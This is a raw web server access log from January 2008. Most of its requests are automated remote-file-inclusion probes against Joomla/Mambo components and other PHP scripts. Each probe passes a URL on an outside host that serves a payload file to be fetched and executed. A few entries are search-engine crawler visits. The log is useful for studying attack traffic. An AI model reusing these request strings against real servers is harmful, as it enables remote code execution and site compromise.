85.128.204.2 - - [13/Jan/2008:12:08:14 -0800] "GET /logs/access_071231.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:12:08:15 -0800] "GET //?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.64" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:12:08:15 -0800] "GET /logs//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 200 5478 "-" "libwww-perl/5.64" "www.galf.org"
65.98.99.250 - - [13/Jan/2008:12:08:20 -0800] "GET /logs/access_071210.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.221.86.240 - - [13/Jan/2008:12:08:24 -0800] "GET /logs/access_071231.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://coldrabbits.com/test/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.221.86.240 - - [13/Jan/2008:12:08:25 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://coldrabbits.com/test/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.221.86.240 - - [13/Jan/2008:12:08:26 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://coldrabbits.com/test/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.142.212.199 - - [13/Jan/2008:12:08:33 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "galf.org"
83.166.220.177 - - [13/Jan/2008:12:08:36 -0800] "GET //components/com_rsgallery2/rsgallery2.html.php?mosConfig_absolute_path=http://winstonwings.org/webcalendar/tools/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.166.220.177 - - [13/Jan/2008:12:08:48 -0800] "GET /logs//components/com_rsgallery2/rsgallery2.html.php?mosConfig_absolute_path=http://winstonwings.org/webcalendar/tools/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.25.2 - - [13/Jan/2008:12:08:49 -0800] "GET /logs/access_071112.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.25.2 - - [13/Jan/2008:12:08:50 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.166.220.177 - - [13/Jan/2008:12:09:07 -0800] "GET /logs/access_070820.log//components/com_rsgallery2/rsgallery2.html.php?mosConfig_absolute_path=http://winstonwings.org/webcalendar/tools/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.97.248.67 - - [13/Jan/2008:12:09:23 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://visual-addicts.com/roren/wp-content/gallery/echo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
89.97.248.67 - - [13/Jan/2008:12:09:23 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://visual-addicts.com/roren/wp-content/gallery/echo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
70.86.201.130 - - [13/Jan/2008:12:09:39 -0800] "GET /logs/access_071014.log//login.php?dir=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:10:13 -0800] "GET /logs/access_071217.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.8.75 - - [13/Jan/2008:12:10:18 -0800] "GET /logs/access_070813.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.98.25.2 - - [13/Jan/2008:12:10:39 -0800] "GET /logs/access_070827.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.99.250 - - [13/Jan/2008:12:10:44 -0800] "GET /logs/access_070806.log//vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.99.250 - - [13/Jan/2008:12:10:44 -0800] "GET /logs//vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.8.118 - - [13/Jan/2008:12:10:45 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.8.118 - - [13/Jan/2008:12:11:21 -0800] "GET /logs/access_071008.log HTTP/1.0" 200 1900544 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
84.16.224.119 - - [13/Jan/2008:12:11:25 -0800] "GET /logs/access_071217.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.98.25.2 - - [13/Jan/2008:12:11:31 -0800] "GET /logs/access_070827.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.165.146 - - [13/Jan/2008:12:11:52 -0800] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.165.146 - - [13/Jan/2008:12:11:52 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.79.165.146 - - [13/Jan/2008:12:11:52 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:12:11:56 -0800] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:12:19 -0800] "GET /logs/access_070910.log//modules/xfsection/modify.php?dir_module=http://claroline.lct-net.cl/claroline/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.240.50.2 - - [13/Jan/2008:12:12:23 -0800] "GET /logs/access_071203.log//modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:12:24 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://claroline.lct-net.cl/claroline/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:12:12:29 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:12:12:29 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:12:12:45 -0800] "GET /logs/access.log//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:12:12:45 -0800] "GET /logs/access.log//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:12:12:46 -0800] "GET //mambots/content/josowbot.content.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:12:12:46 -0800] "GET //mambots/content/josowbot.content.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:12:12:46 -0800] "GET /logs//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:12:12:46 -0800] "GET /logs//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.133.111.29 - - [13/Jan/2008:12:12:52 -0800] "GET /logs/access_071119.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.133.111.29 - - [13/Jan/2008:12:12:53 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.133.111.29 - - [13/Jan/2008:12:12:53 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.240.50.2 - - [13/Jan/2008:12:13:01 -0800] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.98.99.250 - - [13/Jan/2008:12:13:05 -0800] "GET /logs/access_071210.log//vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.70.232.156 - - [13/Jan/2008:12:13:06 -0800] "GET /logs/access_070917.log//login.php?dir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [13/Jan/2008:12:13:06 -0800] "GET //login.php?dir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [13/Jan/2008:12:13:06 -0800] "GET /logs//login.php?dir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.113.226.82 - - [13/Jan/2008:12:13:09 -0800] "GET /logs/access_071028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [13/Jan/2008:12:13:09 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [13/Jan/2008:12:13:09 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.119.200.212 - - [13/Jan/2008:12:13:10 -0800] "GET /logs/access_071028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [13/Jan/2008:12:13:10 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [13/Jan/2008:12:13:11 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:13:57 -0800] "GET /logs/access_071105.log/vwar/admin/?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:13:58 -0800] "GET /logs/vwar/admin/?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.32.108 - - [13/Jan/2008:12:14:00 -0800] "GET /homepage.php?sel=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.133.111.29 - - [13/Jan/2008:12:14:24 -0800] "GET /logs/access_071008.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:14:28 -0800] "GET /logs/access_071029.log//modules/xfsection/modify.php?dir_module=http://claroline.lct-net.cl/claroline/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.8.118 - - [13/Jan/2008:12:14:41 -0800] "GET /logs/access_071008.log HTTP/1.0" 200 5854979 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:15:01 -0800] "GET /logs/access_071231.log//?mosConfig_absolute_path=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:15:03 -0800] "GET /logs//?mosConfig_absolute_path=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 200 5376 "-" "libwww-perl/5.808" "www.galf.org"
87.119.200.212 - - [13/Jan/2008:12:15:23 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.113.226.82 - - [13/Jan/2008:12:15:31 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.16.224.119 - - [13/Jan/2008:12:15:51 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [13/Jan/2008:12:15:51 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.80.193.46 - - [13/Jan/2008:12:16:02 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=37&ct=result HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc2; i686 Linux; 20020702)" "www.galf.org"
38.102.88.143 - - [13/Jan/2008:12:17:01 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
38.102.88.143 - - [13/Jan/2008:12:17:04 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.89.31.52 - - [13/Jan/2008:12:18:05 -0800] "GET /logs/modify.php?dir_module=http://www.freewebtown.com/ooboticario/script.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.89.31.52 - - [13/Jan/2008:12:18:05 -0800] "GET /modify.php?dir_module=http://www.freewebtown.com/ooboticario/script.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.32.108 - - [13/Jan/2008:12:18:28 -0800] "GET /logs/access.log/homepage.php?sel=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.32.108 - - [13/Jan/2008:12:18:29 -0800] "GET /logs/homepage.php?sel=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.32.108 - - [13/Jan/2008:12:18:29 -0800] "GET /logs/access_071231.log/homepage.php?sel=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.103.130.64 - - [13/Jan/2008:12:18:40 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.103.130.64 - - [13/Jan/2008:12:18:40 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.103.130.64 - - [13/Jan/2008:12:18:41 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.70.232.156 - - [13/Jan/2008:12:19:14 -0800] "GET /logs/access_071014.log//login.php?dir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.90.179.94 - - [13/Jan/2008:12:19:15 -0800] "GET /logs/access_071028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [13/Jan/2008:12:19:16 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [13/Jan/2008:12:19:16 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:19:33 -0800] "GET /logs/access_071001.log//?mosConfig_absolute_path=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.103.130.64 - - [13/Jan/2008:12:19:35 -0800] "GET /logs/access_070827.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:20:00 -0800] "GET /logs/access_071217.log/vwar/admin/?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:20:08 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:20:09 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
163.20.160.14 - - [13/Jan/2008:12:20:52 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.krex.tv//modules/jobs/resumes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.20.160.14 - - [13/Jan/2008:12:20:52 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.krex.tv//modules/jobs/resumes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.168.205.154 - - [13/Jan/2008:12:21:04 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.168.205.154 - - [13/Jan/2008:12:21:05 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.168.205.154 - - [13/Jan/2008:12:21:05 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.168.205.154 - - [13/Jan/2008:12:21:06 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.192.68.176 - - [13/Jan/2008:12:21:07 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.16.224.119 - - [13/Jan/2008:12:21:25 -0800] "GET /logs/access_071119.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [13/Jan/2008:12:21:25 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [13/Jan/2008:12:21:25 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.200.51.200 - - [13/Jan/2008:12:23:00 -0800] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.200.51.200 - - [13/Jan/2008:12:23:00 -0800] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:12:23:06 -0800] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:12:23:07 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:23:09 -0800] "GET /logs/access_071028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:23:09 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:23:10 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.16.224.119 - - [13/Jan/2008:12:23:38 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:24:27 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:12:24:39 -0800] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
